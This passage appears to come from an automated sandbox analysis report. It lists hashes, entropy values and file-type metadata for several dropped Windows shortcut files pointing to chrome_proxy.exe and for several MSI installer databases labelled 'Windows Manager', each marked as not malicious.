                                                                                                                                                                                                                                                                        MD5:8AF3D4B83E4D7F7FBF3D0DCBE6B41D3D
                                                                                                                                                                                                                                                                        SHA1:EA25254F27853DDD285E42BF0929BBF7AAF1C1F7
                                                                                                                                                                                                                                                                        SHA-256:A0116F77B9DCF600C377717C1E5689BA8225DEE3814F0BFFC749C65A599A4764
                                                                                                                                                                                                                                                                        SHA-512:C808C168327A39F0B1508B5297C4E0B46C1BF995B8E0096DFD69DB839F2D8E69E10E3E1685D81FF6C1DE9FA0BB5C40231D51A3C2DB07673346F1187B72045079
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......{.H(..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W)l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W)l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W)l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W)l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W+l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........R..d.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 6 12:33:20 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9870756160367877
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8j2dkOTEKzRdHKidAKZdA1weh/iZUkAQkqehgdy+2:8jFOI6Rg9Q/dy
                                                                                                                                                                                                                                                                        MD5:FBF15875F5DB498D7BEFA707EB2A4DFC
                                                                                                                                                                                                                                                                        SHA1:543ADDB0BD52050D4F94A280F7208EA450B1444E
                                                                                                                                                                                                                                                                        SHA-256:63B6A276831A16584E9DE372762B03F3179D93E47D4FB362D9F62B727D580B3D
                                                                                                                                                                                                                                                                        SHA-512:CFBD300D6C668E6CDB2C0638736C85A6ED821D2D3436389F097465BC06E9061290BD24068EC89C7B10D15263B3BF33952C4A7F74328A9BE672DC99C1F5D59BF3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......q.H(..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W)l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W)l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W)l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W)l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W+l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........R..d.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                                                                        Entropy (8bit):3.998487762690777
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8xf2dkOTEKzRsHKidAKZdA14tseh7sFiZUkmgqeh7sGdy+BX:8xfFOI6RLncdy
                                                                                                                                                                                                                                                                        MD5:AF58622F51380EA765D99AAFF986539F
                                                                                                                                                                                                                                                                        SHA1:C80A0F2EA324ACAD11025D8A95BAC335EB4F2AC3
                                                                                                                                                                                                                                                                        SHA-256:3A1C197F11480437EAFCC930C8C74276EDEB86EB340A1DA34D64D3E45022734C
                                                                                                                                                                                                                                                                        SHA-512:2D09876284EF6A93B9E701266AC1646D45589F4F3767D5E8300D44722A1DA057A1926191BF35835B52C7304DEF260ED4C18BC0CF9EEB80D8D38CF23814570AC1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W)l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W)l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W)l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W)l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........R..d.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 6 12:33:20 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9817912290467445
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8w2dkOTEKzRdHKidAKZdA1vehDiZUkwqehEdy+R:8wFOI6Rrudy
                                                                                                                                                                                                                                                                        MD5:86412C9218D42ECA9B7A349FC622DE41
                                                                                                                                                                                                                                                                        SHA1:97B37C99E82EAD487C59F9140E681E019305DB6A
                                                                                                                                                                                                                                                                        SHA-256:B85BD1279EE5A201DF41F6416CBE8E18A60BE15D85FC779893251E4C15BBE1E3
                                                                                                                                                                                                                                                                        SHA-512:F265035BCEF959D6EBBD684F187F211B6DED31EC3C18F00E5A4E8CDD1DB3EDEF62F543D1D3AABD68F38371B2F98983C018FE9297113F3B1AB8AEDF934B525317
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....gKl.H(..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W)l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W)l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W)l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W)l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W+l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........R..d.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 6 12:33:21 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9726810581944174
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8v2dkOTEKzRdHKidAKZdA1hehBiZUk1W1qehCdy+C:8vFOI6Rr9idy
                                                                                                                                                                                                                                                                        MD5:DEE00A2625AFA1D5DC8340F6E5C78C8F
                                                                                                                                                                                                                                                                        SHA1:1894B8A6E00F3307086FC0E5BAA90396A25347EF
                                                                                                                                                                                                                                                                        SHA-256:BA3267FC574B2FFAFB081AEDA6F1DBAC70722DF33EE0C0F3856A0964E9B7101A
                                                                                                                                                                                                                                                                        SHA-512:59997949AD639DC128CEE693F3F2B0A3A17785D844982F77815A04A6605D0581961C29A7BC89B9E9D316BB11AA45F14341DBF9F76A9D495928E0A92EF45464E9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....y.v.H(..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W)l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W)l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W)l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W)l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W+l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........R..d.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 6 12:33:20 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                                                                                        Entropy (8bit):3.984032198519536
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8P2dkOTEKzRdHKidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbcdy+yT+:8PFOI6RLT/TbxWOvTbcdy7T
                                                                                                                                                                                                                                                                        MD5:47641D1FFB4F6576E6264C9E788247F7
                                                                                                                                                                                                                                                                        SHA1:6D54A5E10CACCC26121F27028E0D38757CC2FCF8
                                                                                                                                                                                                                                                                        SHA-256:601C609A6F3E667E1F8029E9DE593632C7A74FDC37B99E3D36DAE123D0B7A763
                                                                                                                                                                                                                                                                        SHA-512:C02791F620C6AC27EC27354A5F4A98BD03C8203941840722EC04830DBEF19CC19D9F354DAABF817753FB133DEED73E8FC9B851AF7349071D87C4A84EBC3BD534
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....Y.b.H(..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W)l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W)l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W)l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W)l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W+l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........R..d.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {C5EBDD8B-C384-4CB5-9A33-9A4EF2189D51}, Number of Words: 0, Subject: Windows Manager, Author: AW Manager, Name of Creating Application: Windows Manager, Template: ;1033, Comments: This installer database contains the logic and data required to install Windows Manager., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3986432
                                                                                                                                                                                                                                                                        Entropy (8bit):6.570721162159989
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:7BAYNADU8HZ3nqmAc4RQ8BtDAoB4aNXVW+hv+Ahi8RhZ2i/NToL5ZHd9ZP9Z9Lzq:WYNAD0tDrPhhoL/+e4UpzjM
                                                                                                                                                                                                                                                                        MD5:6024D8C2207FC4610416BEAF8D360527
                                                                                                                                                                                                                                                                        SHA1:793AB731B07BF86ECC3BA78E1B76DC2AA0B48F8A
                                                                                                                                                                                                                                                                        SHA-256:CB4CAD56EA5391E44DC661513C4F021C5272DB710CC1733251152D1CB0EB5829
                                                                                                                                                                                                                                                                        SHA-512:0BB9CD1EC8873137E654A94C21887B7D4C73A9E561563D52DDEC18377552D1A33D256487362BB614EBB3D804047427977B3EB0070C92FC43D0DD656AF13EEAB4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...................=...................................T.......|.......E...F...G...H...I...J...K...L...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t........................................... ...!.......................................................;...<...=...>...?...@.......................................................................................................................................................................................................................o...............)...@........................................................................................... ...!..."...#...$...%...&...'...(...6...*...7...,...-......./...0...1...2...3...4...5.......8...>...9...:...;...<...=...A...?...H...K...B...C...D...E...F...G...S...I...J.......L...M...N...O...P...Q...R...:...........V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {C5EBDD8B-C384-4CB5-9A33-9A4EF2189D51}, Number of Words: 0, Subject: Windows Manager, Author: AW Manager, Name of Creating Application: Windows Manager, Template: ;1033, Comments: This installer database contains the logic and data required to install Windows Manager., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3986432
                                                                                                                                                                                                                                                                        Entropy (8bit):6.570721162159989
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:7BAYNADU8HZ3nqmAc4RQ8BtDAoB4aNXVW+hv+Ahi8RhZ2i/NToL5ZHd9ZP9Z9Lzq:WYNAD0tDrPhhoL/+e4UpzjM
                                                                                                                                                                                                                                                                        MD5:6024D8C2207FC4610416BEAF8D360527
                                                                                                                                                                                                                                                                        SHA1:793AB731B07BF86ECC3BA78E1B76DC2AA0B48F8A
                                                                                                                                                                                                                                                                        SHA-256:CB4CAD56EA5391E44DC661513C4F021C5272DB710CC1733251152D1CB0EB5829
                                                                                                                                                                                                                                                                        SHA-512:0BB9CD1EC8873137E654A94C21887B7D4C73A9E561563D52DDEC18377552D1A33D256487362BB614EBB3D804047427977B3EB0070C92FC43D0DD656AF13EEAB4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...................=...................................T.......|.......E...F...G...H...I...J...K...L...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t........................................... ...!.......................................................;...<...=...>...?...@.......................................................................................................................................................................................................................o...............)...@........................................................................................... ...!..."...#...$...%...&...'...(...6...*...7...,...-......./...0...1...2...3...4...5.......8...>...9...:...;...<...=...A...?...H...K...B...C...D...E...F...G...S...I...J.......L...M...N...O...P...Q...R...:...........V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F5D6D741-5AB0-4858-81E2-26A50610DFFA}, Number of Words: 0, Subject: Windows Installer, Author: AdvancedWindowsManager, Name of Creating Application: Advanced Installer 18.1.1 build 4b2255d8, Template: ;1033, Comments: This installer database contains the logic and data required to install Windows Installer., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3494400
                                                                                                                                                                                                                                                                        Entropy (8bit):6.511621623392889
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:98304:HYVAUtulbxKO1fTZ+RBIhtkuG09DyGUB9keVJ:hxfTZ+scrGUB
                                                                                                                                                                                                                                                                        MD5:9FC8CC919F8719F753EFF0EBD661523D
                                                                                                                                                                                                                                                                        SHA1:8B5007329F03E546D718B17A81AD3AE652DFF103
                                                                                                                                                                                                                                                                        SHA-256:4B31415F1494ED54BA885B005340ADBBA2E13848836368ACFCEF5E46B888D9AC
                                                                                                                                                                                                                                                                        SHA-512:EFB3C9E5B8CB5A03A4254125202C7E609D3E5680FD81CE9E715140D9F41F87A4A6C975824EDFE4B9A255B9218E33673261998C60DE22720DB3D135A1123F730A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...................6...........................................................................................|...}...~.......................................................................................J...K...L...M...N...O...P...Q...R...S...T...U...x.......{...........................................................................................................................................................................................................................................l...............)...>........................................................................................... ...!..."...#...$...%...&...'...(...6...*...<...,...-......./...0...1...2...3...4...5.......7...8...9...:...;...?...=...G...J...@...A...B...C...D...E...F...Q...H...I...P...K...L...M...N...O...S...Q...R...k...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j.......m...~...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F5D6D741-5AB0-4858-81E2-26A50610DFFA}, Number of Words: 0, Subject: Windows Installer, Author: AdvancedWindowsManager, Name of Creating Application: Advanced Installer 18.1.1 build 4b2255d8, Template: ;1033, Comments: This installer database contains the logic and data required to install Windows Installer., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3494400
                                                                                                                                                                                                                                                                        Entropy (8bit):6.511621623392889
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:98304:HYVAUtulbxKO1fTZ+RBIhtkuG09DyGUB9keVJ:hxfTZ+scrGUB
                                                                                                                                                                                                                                                                        MD5:9FC8CC919F8719F753EFF0EBD661523D
                                                                                                                                                                                                                                                                        SHA1:8B5007329F03E546D718B17A81AD3AE652DFF103
                                                                                                                                                                                                                                                                        SHA-256:4B31415F1494ED54BA885B005340ADBBA2E13848836368ACFCEF5E46B888D9AC
                                                                                                                                                                                                                                                                        SHA-512:EFB3C9E5B8CB5A03A4254125202C7E609D3E5680FD81CE9E715140D9F41F87A4A6C975824EDFE4B9A255B9218E33673261998C60DE22720DB3D135A1123F730A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...................6...........................................................................................|...}...~.......................................................................................J...K...L...M...N...O...P...Q...R...S...T...U...x.......{...........................................................................................................................................................................................................................................l...............)...>........................................................................................... ...!..."...#...$...%...&...'...(...6...*...<...,...-......./...0...1...2...3...4...5.......7...8...9...:...;...?...=...G...J...@...A...B...C...D...E...F...Q...H...I...P...K...L...M...N...O...S...Q...R...k...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j.......m...~...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {BF7EE51F-4DE9-4BDC-9A63-5AFDBF8C954B}, Number of Words: 0, Subject: Windows Installer, Author: AdvancedWindowsManager, Name of Creating Application: Windows Installer, Template: ;1033, Comments: This installer database contains the logic and data required to install Windows Installer., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3910144
                                                                                                                                                                                                                                                                        Entropy (8bit):6.573835059608444
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:lkbY5AMAc4RQ8BtDAoB4aNXVW+hv+AhiJRhZ2iwcUcyPEU8HZ3nq+NToL5ZHd9Zi:8Y5AXtDrmZUyxhoL9+e4Upz
                                                                                                                                                                                                                                                                        MD5:3A26913038116713313BCF96C8852398
                                                                                                                                                                                                                                                                        SHA1:D9A604BABB4A6B4FB4198FA717E0AB58CD0027A5
                                                                                                                                                                                                                                                                        SHA-256:9920FCC0B7ED4843443A1869FDD9DE961AC91441BBB047BDCEFAF9EFC5916093
                                                                                                                                                                                                                                                                        SHA-512:829D6490DEC7A653A3DC2E8CD790B66A54CB5C7EE766AD77E6E00858ED018DC31F0887D5436ECCB58F6E4BB7951E5B428D827AB0EA9C9959EECF92B2B7EA8E47
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...................<...................................T.......|.......C...D...E...F...G...H...I...J...K...L...M...N...O...P...v...w...x.......................6...7...8...9...:...;...<...=...W...X...Y...Z...[...\...]...^..._...`...C...D...E...F...G...H...I...J...K...L...M...N...........i...................................................................................................................................................................................................................n...............)...?........................................................................................... ...!..."...#...$...%...&...'...(...6...*...<...,...-......./...0...1...2...3...4...5.......7...8...9...:...;...@...=...>...H...K...A...B...C...D...E...F...G...S...I...J...V...L...M...N...O...P...Q...R.......{.......V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {BF7EE51F-4DE9-4BDC-9A63-5AFDBF8C954B}, Number of Words: 0, Subject: Windows Installer, Author: AdvancedWindowsManager, Name of Creating Application: Windows Installer, Template: ;1033, Comments: This installer database contains the logic and data required to install Windows Installer., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3910144
                                                                                                                                                                                                                                                                        Entropy (8bit):6.573835059608444
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:lkbY5AMAc4RQ8BtDAoB4aNXVW+hv+AhiJRhZ2iwcUcyPEU8HZ3nq+NToL5ZHd9Zi:8Y5AXtDrmZUyxhoL9+e4Upz
                                                                                                                                                                                                                                                                        MD5:3A26913038116713313BCF96C8852398
                                                                                                                                                                                                                                                                        SHA1:D9A604BABB4A6B4FB4198FA717E0AB58CD0027A5
                                                                                                                                                                                                                                                                        SHA-256:9920FCC0B7ED4843443A1869FDD9DE961AC91441BBB047BDCEFAF9EFC5916093
                                                                                                                                                                                                                                                                        SHA-512:829D6490DEC7A653A3DC2E8CD790B66A54CB5C7EE766AD77E6E00858ED018DC31F0887D5436ECCB58F6E4BB7951E5B428D827AB0EA9C9959EECF92B2B7EA8E47
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
